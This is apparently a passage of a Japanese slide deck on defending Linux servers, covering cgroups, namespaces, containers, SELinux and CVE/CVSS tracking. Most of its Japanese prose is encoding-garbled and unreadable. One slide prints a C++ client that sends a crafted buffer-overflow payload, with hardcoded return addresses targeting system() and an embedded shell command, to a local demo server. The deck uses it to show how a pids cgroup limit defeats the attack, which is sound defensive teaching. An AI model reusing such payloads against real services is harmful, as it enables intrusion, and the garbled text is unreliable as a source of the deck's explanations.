    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    ͦͷ݁Ռ
    Կ΋ׂΓ౰ͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠
    ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
    ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ

    View Slide

  72. LinuxͷίϯςφΛ׆༻ͤΑ

    View Slide

  73. ਌ϓϩηεͱࢠϓϩηε
    ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ
    ͦͷϓϩηε͸ݩͷϓϩηεͷࢠʹͳΔ
    ϓϩηε
    /bin/ls
    execl("/bin/ls","/bin/ls",nullptr );
    ىಈ
    ਌ϓϩηε
    ࢠϓϩηε

    View Slide

  74. init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ
    initҎ֎ͷશͯͷϓϩηε͸
    init͔ΒḷΕΔ਌ࢠؔ܎ͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ
    initͷࢠͷ
    sshd͔Βىಈ͞Εͨ
    bash͔Βىಈ͞Εͨ
    vim
    ਌ϓϩηεͱࢠϓϩηε

    View Slide

  75. init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ
    γεςϜͷϦιʔεͷ࢖༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ
    cgroups
    ྫ:
    ͜ͷൣғͷϓϩηε͸
    1൪໨ͷCPU͔͠
    ࢖ͬͯ͸͍͚ͳ͍
    (cpuset cgroup)

    View Slide

  76. ϒϩοΫI/O cgroup
    ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
    ϒϩοΫσόΠε΁ͷI/OΛ੍ݶ͢Δ
    ͜ͷάϧʔϓ಺ͷϓϩηε͸
    ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ΋
    ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ࢖͑ͳ͍
    ߹ܭ.CQT੍ݶ

    View Slide

  77. ະ࢖༻
    CPU cgroup
    ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
    CPUͷ࢖༻཰Λ੍ݶ͢Δ
    ͜ͷάϧʔϓ಺ͷϓϩηε͸
    ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ΋
    ࢦఆ͞ΕͨҎ্ʹ
    CPUΛ࢖͏ࣄ͸Ͱ͖ͳ͍
    ߹ܭ੍ݶ

    View Slide

  78. cgroups
    ଞʹ΋ϝϞϦͷ࢖༻཰΍HugeTLBͷׂΓ౰ͯͷ੍ݶͳͲ͕
    උΘ͍ͬͯΔ͕
    ੬ऑੑ߈ܸʹର͢Δඋ͑ͱͯ͠஫໨͢΂͖ͳͷ͸
    pids devices
    ͱ

    View Slide

  79. PIDs cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺Ͱ
    ࡞੒Ͱ͖Δϓϩηεͷ࠷େ਺Λ੍ݶ͢Δ
    ϓϩηε
    /bin/ls
    execl("/bin/ls","/bin/ls",nullptr );
    ىಈ
    άϧʔϓ಺ͷϓϩηε਺͕࠷େʹୡ͍ͯ͠Δҝ
    ࢠϓϩηεͷੜ੒Λڋ൱

    View Slide

  80. tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    system()
    γΣϧεΫϦϓτ
    ߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β
    ೚ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷΋खܰͳํ๏system()͸
    தͰࢠϓϩηεΛੜ੒͍ͯ͠Δҝ
    ࢠϓϩηε͕ੜ੒ग़དྷͳ͍ͱ߈ܸ͕େม໘౗ʹͳΔ

    View Slide

  81. $ g++ sample.c -o sample
    $ ./sample
    bin dev home lib32 lost+found mnt proc run sys usr
    boot etc lib lib64 media opt root sbin tmp var
    ੒ޭ
    $ cgcreate -g pids:test
    $ cgset -r pids.max=1 test
    $ cgexec -g pids:test ./sample
    ࣦഊ
    $
    #include
    #include
    int main() {
    if( system( "ls /" ) == 0 ) std::cout << "੒ޭ" << std::endl;
    else std::cout << "ࣦഊ" << std::endl;
    }
    system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ಺༰Λදࣔ͢ΔϓϩάϥϜ
    ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ
    testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ
    test಺ͷ࠷େϓϩηε਺Λ1ʹ͢Δ
    cgroupΛtestʹͯ͠ಈ͔͢ͱ
    system()ʹࣦഊ͢Δ

    View Slide

  82. ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ
    αʔόͷຊདྷͷ༻్Ͱ΋ࢠϓϩηε͕࡞Εͳ͘ͳΔ
    ͜ͷख͕࢖͑Δͷ͸
    ໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ

    View Slide

  83. devices cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
    ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
    αʔό
    γΣϧ
    ىಈ
    ࠓ߈ܸऀ͸ҰൠϢʔβͰͷγΣϧͷىಈʹ੒ޭ͠
    α΢ϯυσόΠεͷ੬ऑੑΛಥ͍ͯ
    rootΛऔΖ͏ͱ͍ͯ͠Δ
    CVE-2017-15265
    ߈ܸऀ
    ੬ऑͳ
    Linux

    View Slide

  84. devices cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
    ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
    αʔό
    γΣϧ
    ىಈ CVE-2017-15265
    ߈ܸऀ
    ͜ͷάϧʔϓʹ͸α΢ϯυσόΠε͸͍Βͳ͍ഺͳͷͰ
    α΢ϯυσόΠεΛ৮ͬͯ͸͍͚ͳ͍ ੬ऑͳ
    Linux
    ͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ

    View Slide

  85. ໊લۭؒ
    ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β
    Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ
    init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    ྫ:
    ͜ͷൣғͷϓϩηεʹ͸
    ֎ͷϓϩηε͕ݟ͑ͳ͍
    (PID໊લۭؒ)
    bash!!!vim
    ͜ͷ໊લۭؒʹͱͬͯͷPID1
    ຊ౰ͷPID1

    View Slide

  86. Ϛ΢ϯτ໊લۭؒ
    Ͳ͜ʹԿ͕Ϛ΢ϯτ͞Ε͍ͯΔ͔ͷ৘ใΛ
    ਌ϓϩηε͔Β෼཭͢Δ
    ਌ϓϩηε
    ࢠϓϩηε
    IPHF
    GVHB
    IPHF
    GVHB
    ਌ϓϩηε͔Βݟ͑Δ/hoge/fuga
    ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga
    chroot΍umountͱ૊Έ߹ΘͤΔࣄͰ
    ࢠϓϩηε͔Β਌ϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ
    ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ

    View Slide

  87. Ϛ΢ϯτ໊લۭؒ
    IPHF
    GVHB
    ߈ܸʹ࢖͑ͦ͏ͳ΋Μ͕
    ͳΜ΋ͳ͍…
    αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ
    σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ
    ߈ܸऀͷબ୒ࢶΛڱΊΔࣄ͕Ͱ͖Δ
    ߈ܸऀ

    View Slide

  88. UID໊લۭؒ
    ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ
    ௨༻͢ΔrootΛ࡞Γग़͢
    ߈ܸऀ
    Զ͸ࠓ͔Β
    rootͩ!

    View Slide

  89. UID໊લۭؒ
    ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ
    ௨༻͢ΔrootΛ࡞Γग़͢
    ߈ܸऀ
    rootͷ໋ྩͩͧ! ͋ͳͨ͸ͦͷ○ͷதͰͷΈ
    rootͳͷͰμϝͰ͢

    View Slide

  90. ໊લۭؒ
    ͜ͷଞʹ΋
    ωοτϫʔΫͷઃఆ
    cgroupͷઃఆ
    ઀ଓͰ͖Δϓϩηεؒ௨৴
    ։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ
    ͳͲ৭Μͳ΋ͷΛ
    ਌ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ

    View Slide

  91. طʹ
    ؾ͍͍ͮͯΔ͔΋͠Εͳ͍͕

    View Slide

  92. cgroupͱ໊લۭؒΛ׆༻ͯ͠
    ਌ϓϩηεͱࢠϓϩηεʹݟ͑Δ෺
    Ͱ͖ΔࣄΛ׬શʹ෼཭ͨ͠ͷ͕
    LinuxͷίϯςφͰ͋Δ

    View Slide

  93. ਌ϓϩηεͱࢠϓϩηεͷ׬શͳ෼཭ͷઃఆΛ
    ؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕
    ྲྀߦΓͷDockerͰ͋Δ
    https://www.docker.com/

    View Slide

  94. ίϯςφͱϚΠΫϩαʔϏε
    cgroupͱ໊લۭؒ͸ϓϩηε୯ҐͰઃఆ͞ΕΔ
    1ͭͷڊେͳϓϩηεͰ
    αʔϏεΛఏڙ͢ΔΑΓ
    ୯७ͳػೳΛఏڙ͢ΔαʔόΛ
    ωοτϫʔΫͰܨ͍Ͱ
    େ͖ͳαʔϏεΛ࡞Δํ͕
    ݸʑͷϓϩηεʹ༩͑Δ
    ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ

    View Slide

  95. ίϯςφͱϚΠΫϩαʔϏε
    ͜ͷΑ͏ͳߏ੒ʹͯ͋͠Δͱ
    ϓϩηεͷ͏ͪͷ1͕ͭ
    Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠΋
    ͦͷ࣌఺ͰͷӨڹΛ
    αʔϏε಺ͷݶΒΕͨྖҬʹ
    ͱͲΊΒΕΔ

    View Slide

  96. ͨͩ͠
    ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ
    ߈ܸऀ͕ίϯςφͷ֎ʹ୤ग़Ͱ͖ͯ͠·͏
    ੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰ஫ҙ
    ྫ$7&

    View Slide

  97. SELinuxΛ׆༻ͤΑ

    View Slide

  98. ॴ༗ऀ: Bob
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ॴ༗ऀͱ
    άϧʔϓϝϯόʔ͸
    ಡΈॻ͖OK
    ݹయతͳ*NIXͷύʔϛογϣϯ
    ΧϨʔ԰৘ใ
    Alice
    (ΧϨʔಉ޷ձձһ)
    "MJDF͞Μ͸άϧʔϓϝϯόʔ
    άϧʔϓϝϯόʔͷॻ͖ࠐΈ͸0,
    Linux
    OK
    ͋ͷϑΝΠϧʹ
    ॻ͖͍ͨ

    View Slide

  99. ͜ͷΑ͏ʹϢʔβ͕ࣗ෼Ͱ
    ৘ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ
    ΞΫηε੍ޚΛ
    ೚ҙΞΫηε੍ޚ
    ͱݺͿ

    View Slide

  100. ॴ༗ऀ: Bob
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ॴ༗ऀͱ
    άϧʔϓϝϯόʔ͸
    ಡΈॻ͖OK
    ΧϨʔ԰৘ใ
    BobΛࣗশ͢Δ
    ߈ܸऀ #PC͞Μ͸
    ϑΝΠϧͷॴ༗ऀ͔ͩΒ
    #PC͞ΜͷཁٻͳΒؒҧ͍ͳ͍
    Linux
    ͋ͷϑΝΠϧΛ
    ࣺͯͨ͘ͳͬͨ
    OK
    ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

    View Slide

  101. ॴ༗ऀ: Charlie
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ୭Ͱ΋ಡΈॻ͖ࣗ༝
    ۃൿ৘ใ
    Charlie
    $IBSMJF͞Μ͸
    ϑΝΠϧͷॴ༗ऀ͔ͩΒ
    $IBSMJF͞ΜͷཁٻͳΒؒҧ͍ͳ͍
    Linux
    OK
    *NIXΑʔΘ͔ΒΜ
    777ʹ͠ͱ͍ͯ
    ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

    View Slide

  102. γεςϜ؅ཧऀ͕γεςϜશମʹ
    ηΩϡϦςΟཁ݅Λڧ੍͢Δ
    ڧ੍ΞΫηε੍ޚ
    ͕ཁΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    Charlie͕ͲΜͳʹζϘϥͰ΋
    γεςϜશମͷηΩϡϦςΟ͸อͨΕΔඞཁ͕͋Δ

    View Slide

  103. ୭͔ͩΒʙ͕Ͱ͖Δ
    ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ͸
    ୭͔͸࢖͍෺ʹͳΒͳ͍

    View Slide

  104. શͯͷϓϩηεʹ͸਌ࢠؔ܎͕͋Δ
    ͋Δ೔ͷBob͞Μͷϓϩηε
    Bob
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ

    View Slide

  105. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
    ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ
    Bob
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ϓϩηε͕߈ܸऀͷखʹམͪΔͱ
    ͜͏͍͏ঢ়ଶʹͳΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

    View Slide

  106. ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ
    ϓϩηεʹυϝΠϯΛ͚ͭΑ͏
    υϝΠϯ͸͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ෇༩͞Ε
    ࢠϓϩηεʹҾ͖ܧ͕Ε
    SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍
    Bob ૟আத
    ૟আத ͜Ε
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

    View Slide

  107. ૟আத ʹΞΫηεͯ͠ྑ͍΋ͷ
    Ϧιʔεʹ΋υϝΠϯ(λΠϓ)Λ͚ͭΑ͏
    SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

    View Slide

  108. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
    ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
    Ոͷ૟আΛ͢Δ
    Bob
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ͢Δͱ߈ܸऀͷϓϩηε͸͜͏ͳΔ
    ૟আத
    ૟আத
    ૟আத
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

    View Slide

  109. Linux
    ͳΜ͚ͩͲ
    ΧϨʔಉ޷ձͷϊʔτʹॻ͖ࠐΈͤͯ͞
    ૟আ͍ͤ
    υϝΠϯͷෆҰகΛཧ༝ʹ
    ৘ใ΁ͷΞΫηεΛڋ൱Ͱ͖Δ
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ૟আத
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

    View Slide

  110. ॏཁͳϙΠϯτ
    ୭͔ͩΒڐՄ͢Δ
    Ͱ͸ͳ͘
    ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ
    ʹͳ͍ͬͯΔ

    View Slide

  111. Æ
    SELinux
    ύʔϛογϣϯ
    system_u:object_r:
    passwd_exec_t
    Bob
    ॴ༗ऀ: Bob
    ॴ༗ऀͷಡΈॻ͖OK
    ಡΜͰOK

    SELinux
    passwd_exec_t
    ͸ಡΜͰྑ͍
    ಡΜͰOK
    ૯ධ
    ಡΜͰOK
    ͋ͷϑΝΠϧ
    ݟͤͯ
    #PC͞Μ͕ࣗ෼Ͱ
    ઃఆͰ͖Δൣғ
    SELinux
    passwd_exec_t
    ͸࢖ͬͯ͸͍͚ͳ͍
    ࢖༻ېࢭ
    ૯ධ
    ࢖༻ېࢭ
    8080
    8080൪ϙʔτΛ
    ࢖͍͍ͨͳ

    View Slide

  112. $ sesearch --allow

    allow passwd_t crack_db_t:dir { getattr ioctl lock open read search };
    allow passwd_t crack_db_t:file { getattr ioctl lock open read };
    allow passwd_t default_context_t:dir { getattr open search };
    allow passwd_t device_t:dir { getattr ioctl lock open read search };

    allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename
    setattr unlink write };

    allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read };

    allow user_t passwd_exec_t:file { execute getattr open read };
    allow user_t passwd_t:process transition;

    ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β
    passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ
    passwd_tυϝΠϯ΁ͷભҠ͕ೝΊΒΕΔ
    passwd_exec_tʹ
    ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ
    passwd_tʹભҠ͢Δ
    passwd_tυϝΠϯͰ͸passwdΛ࣮ߦ͢Δͷʹඞཁͳ΋ͷ͔͠৮Εͳ͍
    passwd_tͷϓϩηε͸
    shadow_tλΠϓͷ
    ύεϫʔυϑΝΠϧΛ৮ΕΔ

    View Slide

  113. passwd
    ύεϫʔυϑΝΠϧ
    ਖ਼نͷϩάΠϯखॱͰ
    ೖ͖ͬͯͨϢʔβ
    ύεϫʔυͱ
    ؔ܎ͳ͍
    ϑΝΠϧ
    shadow_t΁ͷΞΫηεݖ͕ͳ͍
    ແؔ܎ͳϑΝΠϧ΁ͷ
    ΞΫηεݖ͕ͳ͍
    passwd_tʹભҠ
    Bob
    ਖ਼نͷϩάΠϯखॱͰ
    ೖͬͯ͜ͳ͔ͬͨϢʔβ
    passwd_tʹ
    ભҠ͢Δݖݶ͕ͳ͍
    shadow_t΁ͷ
    ΞΫηεݖ͕ͳ͍
    BobʹͳΓ͢·͢߈ܸऀ
    passwd_t͸shadow_tΛ৮ΕΔ

    View Slide

  114. SELinuxͷઃఆΛద੾ʹߦ͏ࣄͰ
    ߈ܸऀ͕ϓϩηεΛ৐ͬऔͬͨͱͯ͠΋
    ͦͷӨڹΛ
    ͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ
    ݶఆͰ͖Δ

    View Slide

  115. SELinux͕ΞΫηεΛڋ൱͢Δͱ
    ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ
    audit: type=1400 audit(1521959710.081:83): avc: denied
    { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
    ino=524679 scontext=staff_u:staff_r:staff_t
    tcontext=system_u:object_r:shadow_t tclass=file
    passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ
    ίϚϯυchmod͕
    shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ
    ύʔϛογϣϯΛॻ͖׵͑Α͏ͱͨ͠ҝ
    ڋ൱ͨ͠

    View Slide

  116. audit: type=1400 audit(1521959710.081:83): avc: denied
    { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
    ino=524679 scontext=staff_u:staff_r:staff_t
    tcontext=system_u:object_r:shadow_t tclass=file
    ιϑτ΢ΣΞʹ͜ͷૢ࡞Λ͢΂͖ਖ਼౰ͳཧ༝͕͋Δ৔߹
    ͦͷιϑτ΢ΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏
    ͦͷιϑτ΢ΣΞ͕ਖ਼ৗʹ࢖ΘΕΔͱ͖ʹ
    ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏
    ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏

    View Slide

  117. ࣮ࡍͷSELinuxͷઃఆखॱ͸௕͘ͳΔͷͰׂѪ
    ίϚϯυ΍ઃఆϑΝΠϧͷ࢖͍ํ͸
    RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ
    https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/
    selinux_users_and_administrators_guide/
    ͜͜ʹ
    3FE)BUͷ4&-JOVYϢʔβʔͱ؅ཧऀͷΨΠυΛషΔ

    View Slide

  118. RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ࢖͏৔߹
    γεςϜͷϢʔβ΍λΠϓ໊ɺͦͷݖݶͷൣғ͕
    ҟͳ͍ͬͯΔՄೳੑ͕͋Δ
    ࢖༻͢ΔσΟετϦϏϡʔγϣϯʹ
    SELinuxʹؔ͢Δઆ໌͕͋Δ৔߹͸
    ͦͪΒ΋ࢀর͢΂͠

    View Slide

  119. ੬ऑੑ৘ใͷ௥͍ํ

    View Slide

  120. αʔό্Ͱಈ͍͍ͯΔͷ͕
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ͚ͩ
    ͱ͍͏έʔε͸كͰ͋Δ
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    Χʔωϧ(OS)
    υϥΠό υϥΠό
    ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
    ศརͳϥΠϒϥϦ

    View Slide

  121. ࣗ෼Ͱ࡞͍ͬͯͳ͍෦෼Ͱ੬ऑੑ͕ݟ͔ͭͬͯ
    ࣗ෼ͷιϑτ΢ΣΞ͕҆શͰͳ͘ͳΔ͜ͱ͸Α͋͘Δ
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    Χʔωϧ
    υϥΠό υϥΠό
    ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
    ศརͳϥΠϒϥϦ

    View Slide

  122. ར༻͍ͯ͠Δ
    Αͦͷιϑτ΢ΣΞͷ
    ੬ऑੑ৘ใΛؾʹ͔͚Α͏

    View Slide

  123. Common Vulnerabilities and Exposures
    ڞ௨੬ऑੑࣝผࢠ ུͯ͠$7&

    ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ
    Ұҙͳ*%ΛׂΓ౰ͯͯσʔλϕʔεԽ͍ͯ͠Δ
    http://www.cve.mitre.org/
    ͜͜ʹ
    $7&ͷ8FCαΠτͷτοϓϖʔδΛషΔ

    View Slide

  124. Common Vulnerabilities and Exposures
    BQBDIFͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ
    http://www.cve.mitre.org/cve/search_cve_list.html
    ͜͜ʹ
    $7&ͷ8FCαΠτͰBQBDIFͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ

    View Slide

  125. ͜͜ʹ
    $7&ͷ/*45ʹΑΔղઆΛషΔ
    Common Vulnerabilities and Exposures
    "QBDIFIUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ৔߹ʹ
    ϦϞʔτ͔Βݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ
    6TFBGUFSGSFF੬ऑੑͰ͋Γ
    ඞͣ͠΋ݟ͑ͯ͸͍͚ͳ͍৘ใ͕ૹΒΕΔ༁Ͱ͸ͳ͍
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798

    View Slide

  126. Common Vulnerability Scoring System
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798
    ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS)
    ੬ऑੑͷϠό͞Λ਺஋ʹͨ͠΋ͷ
    ͜ΕΛݟΕ͹੬ऑੑͷ࢓૊Έ͕Θ͔Βͳͯ͘΋
    Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ
    ͜͜ʹ
    $7&ͷ$744ΛషΔ

    View Slide

  127. Common Vulnerability Scoring System
    جຊධՁج४(Base Metrics)
    ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
    ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
    ݱঢ়ධՁج४ (Temporal Metrics)
    ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
    ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
    ؀ڥධՁج४(Environmental Metrics)
    ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
    ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ

    View Slide

  128. Common Vulnerability Scoring System
    جຊධՁج४(Base Metrics)
    ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
    ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
    ݱঢ়ධՁج४ (Temporal Metrics)
    ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
    ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
    ؀ڥධՁج४(Environmental Metrics)
    ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
    ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ
    ͜͜ʹ
    $7&ͷ$744ΛషΔ
    ࣌ͱ৔ॴʹґΒͳ͍جຊධՁج४ͷείΞ͕
    ੬ऑੑ৘ใͱͯ͠ެ։͞Ε͍ͯΔ

    View Slide

  129. جຊධՁج४ (Base Metrics)
    ߈ܸݩ۠෼(Access Vector)
    ߈ܸऀ͸Ͳ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔
    ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ΋

